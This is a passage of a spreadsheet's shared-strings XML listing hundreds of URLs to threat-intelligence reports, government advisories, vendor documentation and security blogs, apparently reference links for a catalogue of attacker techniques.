    <t>https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html</t>
  </si>
  <si>
    <t>https://www.attackify.com/blog/rundll32_execution_order/</t>
  </si>
  <si>
    <t>https://pentestlab.blog/2012/10/30/attacking-vnc-servers/</t>
  </si>
  <si>
    <t>https://www.scip.ch/en/?labs.20150108</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy</t>
  </si>
  <si>
    <t>https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/</t>
  </si>
  <si>
    <t>https://auth0.com/docs/tokens/access-tokens</t>
  </si>
  <si>
    <t>https://auth0.com/learn/refresh-tokens/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns</t>
  </si>
  <si>
    <t>https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities</t>
  </si>
  <si>
    <t>https://www.avira.com/en/blog/new-wave-of-plugx-targets-hong-kong</t>
  </si>
  <si>
    <t>https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/</t>
  </si>
  <si>
    <t>https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/</t>
  </si>
  <si>
    <t>https://github.com/dhondta/awesome-executable-packing</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/rest/api/resources/</t>
  </si>
  <si>
    <t>https://github.com/Azure/Stormspotter</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion</t>
  </si>
  <si>
    <t>https://blog.xpnsec.com/azuread-connect-for-redteam/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/previous-versions/azure/ad/graph/howto/azure-ad-graph-api-operations-overview</t>
  </si>
  <si>
    <t>https://learn.microsoft.com/en-us/azure/active-directory/hybrid/choose-ad-authn</t>
  </si>
  <si>
    <t>https://o365blog.com/post/pta/</t>
  </si>
  <si>
    <t>https://o365blog.com/post/just-looking</t>
  </si>
  <si>
    <t>https://adsecurity.org/?p=4277</t>
  </si>
  <si>
    <t>https://o365blog.com/post/just-looking/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/azure/storage/blobs/snapshots-overview</t>
  </si>
  <si>
    <t>https://azure.microsoft.com/en-us/services/storage/blobs/</t>
  </si>
  <si>
    <t>https://azure.microsoft.com/en-us/services/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/rest/api/storageservices/delegate-access-with-shared-access-signature</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/rest/api/compute/virtual-machines/update</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview</t>
  </si>
  <si>
    <t>https://www.bbc.com/news/technology-60953527</t>
  </si>
  <si>
    <t>https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf</t>
  </si>
  <si>
    <t>https://www.blackhat.com/docs/us-16/materials/us-16-Quintin-When-Governments-Attack-State-Sponsored-Malware-Attacks-Against-Activists-Lawyers-And-Journalists.pdf</t>
  </si>
  <si>
    <t>https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/</t>
  </si>
  <si>
    <t>https://brica.de/alerts/alert/public/1255063/kimsuky-unveils-apt-campaign-smoke-screen-aimed-at-korea-and-america/</t>
  </si>
  <si>
    <t>https://www.youtube.com/watch?v=nJ0UsyiUEqQ</t>
  </si>
  <si>
    <t>https://medium.com/daniel-grzelak/backdooring-an-aws-account-da007d36f8f9</t>
  </si>
  <si>
    <t>https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/</t>
  </si>
  <si>
    <t>https://www.baeldung.com/linux/ld_preload-trick-what-is</t>
  </si>
  <si>
    <t>https://www.baltimoresun.com/politics/bs-md-ci-it-outage-20190507-story.html</t>
  </si>
  <si>
    <t>https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/</t>
  </si>
  <si>
    <t>https://securelist.com/the-naikon-apt/69953/</t>
  </si>
  <si>
    <t>https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf</t>
  </si>
  <si>
    <t>http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599</t>
  </si>
  <si>
    <t>https://medium.com/swlh/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316</t>
  </si>
  <si>
    <t>https://security.berkeley.edu/node/94</t>
  </si>
  <si>
    <t>https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319</t>
  </si>
  <si>
    <t>https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365</t>
  </si>
  <si>
    <t>https://labs.bishopfox.com/tech-blog/sliver</t>
  </si>
  <si>
    <t>https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/</t>
  </si>
  <si>
    <t>https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf</t>
  </si>
  <si>
    <t>https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/</t>
  </si>
  <si>
    <t>https://businessinsights.bitdefender.com/deep-dive-into-a-fin8-attack-a-forensic-investigation</t>
  </si>
  <si>
    <t>https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf</t>
  </si>
  <si>
    <t>https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf</t>
  </si>
  <si>
    <t>https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf</t>
  </si>
  <si>
    <t>https://www.bitdefender.com/blog/labs/trickbot-is-dead-long-live-trickbot/</t>
  </si>
  <si>
    <t>https://www.bitdefender.com/files/News/CaseStudies/study/316/Bitdefender-Whitepaper-TrickBot-en-EN-interactive.pdf</t>
  </si>
  <si>
    <t xml:space="preserve">https://www.bitdefender.com/files/News/CaseStudies/study/399/Bitdefender-PR-Whitepaper-Trickbot-creat5515-en-EN.pdf </t>
  </si>
  <si>
    <t>https://airbus-cyber-security.com/the-eye-of-the-tiger/</t>
  </si>
  <si>
    <t>https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf</t>
  </si>
  <si>
    <t>https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/</t>
  </si>
  <si>
    <t>https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/</t>
  </si>
  <si>
    <t>https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot</t>
  </si>
  <si>
    <t>https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf</t>
  </si>
  <si>
    <t>https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced</t>
  </si>
  <si>
    <t>https://www.blackhat.com/docs/us-15/materials/us-15-Choi-API-Deobfuscator-Resolving-Obfuscated-API-Functions-In-Modern-Packers.pdf</t>
  </si>
  <si>
    <t>https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf</t>
  </si>
  <si>
    <t>http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf</t>
  </si>
  <si>
    <t>https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf</t>
  </si>
  <si>
    <t>http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf</t>
  </si>
  <si>
    <t>http://www.blackhillsinfosec.com/?p=4645</t>
  </si>
  <si>
    <t>https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/</t>
  </si>
  <si>
    <t>http://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments</t>
  </si>
  <si>
    <t>https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/</t>
  </si>
  <si>
    <t>https://www.bleepingcomputer.com/news/security/op-sharpshooter-connected-to-north-koreas-lazarus-group/</t>
  </si>
  <si>
    <t>https://www.bleepingcomputer.com/news/security/new-godlua-malware-evades-traffic-monitoring-via-dns-over-https/</t>
  </si>
  <si>
    <t>https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/</t>
  </si>
  <si>
    <t>https://www.bleepingcomputer.com/news/security/russian-hacker-pleads-guilty-for-role-in-infamous-linux-ebury-malware/</t>
  </si>
  <si>
    <t>https://www.bleepingcomputer.com/news/security/hacking-group-s-new-malware-abuses-google-and-facebook-services/</t>
  </si>
  <si>
    <t>https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/</t>
  </si>
  <si>
    <t>https://www.bleepingcomputer.com/news/security/ukraine-links-members-of-gamaredon-hacker-group-to-russian-fsb/</t>
  </si>
  <si>
    <t>https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/</t>
  </si>
  <si>
    <t>https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf</t>
  </si>
  <si>
    <t>https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1</t>
  </si>
  <si>
    <t>https://www.youtube.com/watch?v=wQ1CuAPnrLM&amp;feature=youtu.be&amp;t=2815</t>
  </si>
  <si>
    <t>https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf</t>
  </si>
  <si>
    <t>https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident</t>
  </si>
  <si>
    <t>https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf</t>
  </si>
  <si>
    <t>https://www.bromium.com/how-ursnif-evades-detection/</t>
  </si>
  <si>
    <t>http://www.nth-dimension.org.uk/pub/BTL.pdf</t>
  </si>
  <si>
    <t>https://security.web.cern.ch/advisories/windigo/windigo.shtml</t>
  </si>
  <si>
    <t>https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf</t>
  </si>
  <si>
    <t>http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf</t>
  </si>
  <si>
    <t>https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf</t>
  </si>
  <si>
    <t>https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-003.pdf</t>
  </si>
  <si>
    <t>http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html</t>
  </si>
  <si>
    <t>http://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf</t>
  </si>
  <si>
    <t>https://www.cisecurity.org/blog/emotet-changes-ttp-and-arrives-in-united-states/</t>
  </si>
  <si>
    <t>https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/</t>
  </si>
  <si>
    <t>https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/alerts/aa20-239a</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/alerts/aa20-259a</t>
  </si>
  <si>
    <t>https://www.cisa.gov/uscert/ncas/alerts/aa20-296a#revisions</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/alerts/aa20-301a</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/alerts/aa21-200a</t>
  </si>
  <si>
    <t>https://www.cisa.gov/uscert/ncas/alerts/aa22-057a</t>
  </si>
  <si>
    <t>https://www.cisa.gov/uscert/ncas/analysis-reports/AR18-352A</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/alerts/aa21-048a</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239a</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/tips/ST05-016</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/APTs-Targeting-IT-Service-Provider-Customers</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/alerts/aa20-266a</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/analysis-reports/ar20-133b</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a</t>
  </si>
  <si>
    <t>https://www.cisa.gov/uscert/ncas/alerts/aa22-074a</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/alerts/aa20-258a</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/alerts/aa21-008a</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b</t>
  </si>
  <si>
    <t>https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference</t>
  </si>
  <si>
    <t>https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/</t>
  </si>
  <si>
    <t>https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China</t>
  </si>
  <si>
    <t>https://blog.securelayer7.net/how-to-perform-csv-excel-macro-injection/</t>
  </si>
  <si>
    <t>https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/</t>
  </si>
  <si>
    <t>https://www.secureworks.com/blog/malware-lingers-with-bits</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html</t>
  </si>
  <si>
    <t>https://cwe.mitre.org/top25/index.html</t>
  </si>
  <si>
    <t>https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/</t>
  </si>
  <si>
    <t>https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/</t>
  </si>
  <si>
    <t>https://www.cadosecurity.com/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials/</t>
  </si>
  <si>
    <t>http://blog.trendmicro.com/trendlabs-security-intelligence/bkdr_rarstone-new-rat-to-watch-out-for/</t>
  </si>
  <si>
    <t>http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf</t>
  </si>
  <si>
    <t>http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf</t>
  </si>
  <si>
    <t>https://www.carbonblack.com/2019/04/24/cb-tau-threat-intelligence-notification-emotet-utilizing-wmi-to-launch-powershell-encoded-code/</t>
  </si>
  <si>
    <t>https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/</t>
  </si>
  <si>
    <t>https://www.carbonblack.com/2019/05/14/cb-tau-threat-intelligence-notification-jcry-ransomware-pretends-to-be-adobe-flash-player-update-installer/</t>
  </si>
  <si>
    <t>https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/</t>
  </si>
  <si>
    <t>https://blogs.vmware.com/security/2020/02/vmware-carbon-black-tau-threat-analysis-shlayer-macos.html</t>
  </si>
  <si>
    <t>https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/</t>
  </si>
  <si>
    <t>https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/</t>
  </si>
  <si>
    <t>https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/</t>
  </si>
  <si>
    <t>https://www.carbonblack.com/2019/05/17/cb-tau-threat-intelligence-notification-robbinhood-ransomware-stops-181-windows-services-before-encryption/</t>
  </si>
  <si>
    <t>http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html</t>
  </si>
  <si>
    <t>https://www.kb.cert.org/vuls/id/843464</t>
  </si>
  <si>
    <t>https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/</t>
  </si>
  <si>
    <t>https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)</t>
  </si>
  <si>
    <t>https://www.mdsec.co.uk/2017/07/categorisation-is-not-a-security-boundary/</t>
  </si>
  <si>
    <t>https://blog.certfa.com/posts/charming-kitten-christmas-gift/</t>
  </si>
  <si>
    <t>http://gosecure.net/2018/02/14/chaos-stolen-backdoor-rising/</t>
  </si>
  <si>
    <t>https://research.checkpoint.com/2021/the-story-of-jian/</t>
  </si>
  <si>
    <t>https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/</t>
  </si>
  <si>
    <t>https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/</t>
  </si>
  <si>
    <t>https://blog.checkpoint.com/2015/05/14/analysis-havij-sql-injection-tool/</t>
  </si>
  <si>
    <t>https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/</t>
  </si>
  <si>
    <t>https://research.checkpoint.com/2020/ransomware-alert-pay2key/</t>
  </si>
  <si>
    <t>https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf</t>
  </si>
  <si>
    <t>https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/</t>
  </si>
  <si>
    <t>https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/</t>
  </si>
  <si>
    <t>https://research.checkpoint.com/2020/bandook-signed-delivered/</t>
  </si>
  <si>
    <t>https://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/</t>
  </si>
  <si>
    <t>https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/</t>
  </si>
  <si>
    <t>https://research.checkpoint.com/2019/ponys-cc-servers-hidden-inside-the-bitcoin-blockchain/</t>
  </si>
  <si>
    <t>https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/</t>
  </si>
  <si>
    <t>https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf</t>
  </si>
  <si>
    <t>https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/</t>
  </si>
  <si>
    <t>https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/</t>
  </si>
  <si>
    <t>https://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/</t>
  </si>
  <si>
    <t>http://www.chkrootkit.org/</t>
  </si>
  <si>
    <t>http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html</t>
  </si>
  <si>
    <t>https://kjaer.io/extension-malware/</t>
  </si>
  <si>
    <t>https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/</t>
  </si>
  <si>
    <t>https://developer.chrome.com/extensions</t>
  </si>
  <si>
    <t>https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a</t>
  </si>
  <si>
    <t>https://ciberseguridad.blog/decodificando-ficheros-rtf-maliciosos/</t>
  </si>
  <si>
    <t>https://www.circl.lu/services/passive-dns/</t>
  </si>
  <si>
    <t>https://www.cisco.com/c/en/us/products/collateral/switches/catalyst-6500-series-switches/white_paper_c11_603839.html</t>
  </si>
  <si>
    <t>https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3</t>
  </si>
  <si>
    <t>https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2022/03/threat-advisory-caddywiper.html</t>
  </si>
  <si>
    <t>http://blog.talosintelligence.com/2017/03/dnsmessenger.html</t>
  </si>
  <si>
    <t>https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf</t>
  </si>
  <si>
    <t>http://blogs.cisco.com/security/talos/threat-spotlight-group-72</t>
  </si>
  <si>
    <t>http://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities</t>
  </si>
  <si>
    <t>http://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities-part-2</t>
  </si>
  <si>
    <t>https://www.recurity-labs.com/research/RecurityLabs_Developments_in_IOS_Forensics.pdf</t>
  </si>
  <si>
    <t>http://2015.zeronights.org/assets/files/05-Nosenko.pdf</t>
  </si>
  <si>
    <t>https://tools.cisco.com/security/center/resources/integrity_assurance.html#38</t>
  </si>
  <si>
    <t>https://tools.cisco.com/security/center/resources/integrity_assurance.html#26</t>
  </si>
  <si>
    <t>https://tools.cisco.com/security/center/resources/integrity_assurance.html#31</t>
  </si>
  <si>
    <t>https://tools.cisco.com/security/center/resources/integrity_assurance.html#23</t>
  </si>
  <si>
    <t>https://tools.cisco.com/security/center/resources/integrity_assurance.html#40</t>
  </si>
  <si>
    <t>https://tools.cisco.com/security/center/resources/integrity_assurance.html#34</t>
  </si>
  <si>
    <t>https://tools.cisco.com/security/center/resources/integrity_assurance.html#30</t>
  </si>
  <si>
    <t>https://tools.cisco.com/security/center/resources/integrity_assurance.html#7</t>
  </si>
  <si>
    <t>https://tools.cisco.com/security/center/resources/integrity_assurance.html#13</t>
  </si>
  <si>
    <t>https://tools.cisco.com/security/center/resources/integrity_assurance.html#35</t>
  </si>
  <si>
    <t>https://tools.cisco.com/security/center/resources/integrity_assurance.html#39</t>
  </si>
  <si>
    <t>https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/20370-snmpsecurity-20370.html</t>
  </si>
  <si>
    <t>https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2022/04/teamtnt-targeting-aws-alibaba.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html</t>
  </si>
  <si>
    <t>https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html</t>
  </si>
  <si>
    <t xml:space="preserve"> https://blog.talosintelligence.com/2022/01/ukraine-campaign-delivers-defacement.html</t>
  </si>
  <si>
    <t>https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/</t>
  </si>
  <si>
    <t>https://umbrella.cisco.com/blog/2015/02/18/at-high-noon-algorithms-do-battle/</t>
  </si>
  <si>
    <t>https://blogs.cisco.com/security/talos/angler-domain-shadowing</t>
  </si>
  <si>
    <t>https://citizenlab.ca/2016/08/group5-syria/</t>
  </si>
  <si>
    <t>https://citizenlab.org/2016/05/stealth-falcon/</t>
  </si>
  <si>
    <t>https://citizenlab.ca/2016/11/parliament-keyboy/</t>
  </si>
  <si>
    <t>https://citizenlab.ca/2018/08/familiar-feeling-a-malware-campaign-targeting-the-tibetan-diaspora-resurfaces/</t>
  </si>
  <si>
    <t>https://citizenlab.ca/2015/12/packrat-report/</t>
  </si>
  <si>
    <t>http://www.symantec.com/connect/blogs/trojanzeroaccessc-hidden-ntfs-ea</t>
  </si>
  <si>
    <t>http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf</t>
  </si>
  <si>
    <t>http://www.clearskysec.com/copykitten-jpost/</t>
  </si>
  <si>
    <t>https://www.clearskysec.com/wp-content/uploads/2019/10/The-Kittens-Are-Back-in-Town-2-1.pdf</t>
  </si>
  <si>
    <t>https://www.clearskysec.com/wp-content/uploads/2020/08/The-Kittens-are-Back-in-Town-3.pdf</t>
  </si>
  <si>
    <t>https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf</t>
  </si>
  <si>
    <t>https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf</t>
  </si>
  <si>
    <t>https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf</t>
  </si>
  <si>
    <t>https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf</t>
  </si>
  <si>
    <t>http://www.clearskysec.com/oilrig/</t>
  </si>
  <si>
    <t>https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf</t>
  </si>
  <si>
    <t>https://www.clearskysec.com/siamesekitten/</t>
  </si>
  <si>
    <t>http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf</t>
  </si>
  <si>
    <t>https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf</t>
  </si>
  <si>
    <t>https://www.clearskysec.com/fox-kitten/</t>
  </si>
  <si>
    <t>https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking</t>
  </si>
  <si>
    <t>https://cloud.google.com/logging/docs/audit#admin-activity</t>
  </si>
  <si>
    <t>https://blog.cloudsploit.com/the-danger-of-unused-aws-regions-af0bf1b878fc</t>
  </si>
  <si>
    <t>https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/</t>
  </si>
  <si>
    <t>https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/</t>
  </si>
  <si>
    <t>https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/</t>
  </si>
  <si>
    <t>https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/</t>
  </si>
  <si>
    <t>https://blog.cloudflare.com/reflections-on-reflections/</t>
  </si>
  <si>
    <t>https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/</t>
  </si>
  <si>
    <t>https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/</t>
  </si>
  <si>
    <t>https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/</t>
  </si>
  <si>
    <t>https://www.cobaltstrike.com/help-browser-pivoting</t>
  </si>
  <si>
    <t>https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20210708035426/https://www.cobaltstrike.com/downloads/csmanual43.pdf</t>
  </si>
  <si>
    <t>https://www.cobaltstrike.com/downloads/reports/tacticstechniquesandprocedures.pdf</t>
  </si>
  <si>
    <t>https://blog.cobaltstrike.com/2017/05/23/cobalt-strike-3-8-whos-your-daddy/</t>
  </si>
  <si>
    <t>https://www.cobaltstrike.com/help-scripted-web-delivery</t>
  </si>
  <si>
    <t>https://www.datawire.io/code-injection-on-linux-and-macos/</t>
  </si>
  <si>
    <t>https://cofense.com/seeing-resurgence-demonic-astaroth-wmic-trojan/</t>
  </si>
  <si>
    <t>https://cofense.com/nanocore-rat-resurfaced-sewers/</t>
  </si>
  <si>
    <t>https://cofense.com/upgrades-delivery-support-infrastructure-revenge-rat-malware-bigger-threat/</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/</t>
  </si>
  <si>
    <t>https://www.commandfive.com/papers/C5_APT_SKHack.pdf</t>
  </si>
  <si>
    <t>https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/</t>
  </si>
  <si>
    <t>https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml</t>
  </si>
  <si>
    <t>https://cloud.google.com/logging/docs/audit/configure-data-access</t>
  </si>
  <si>
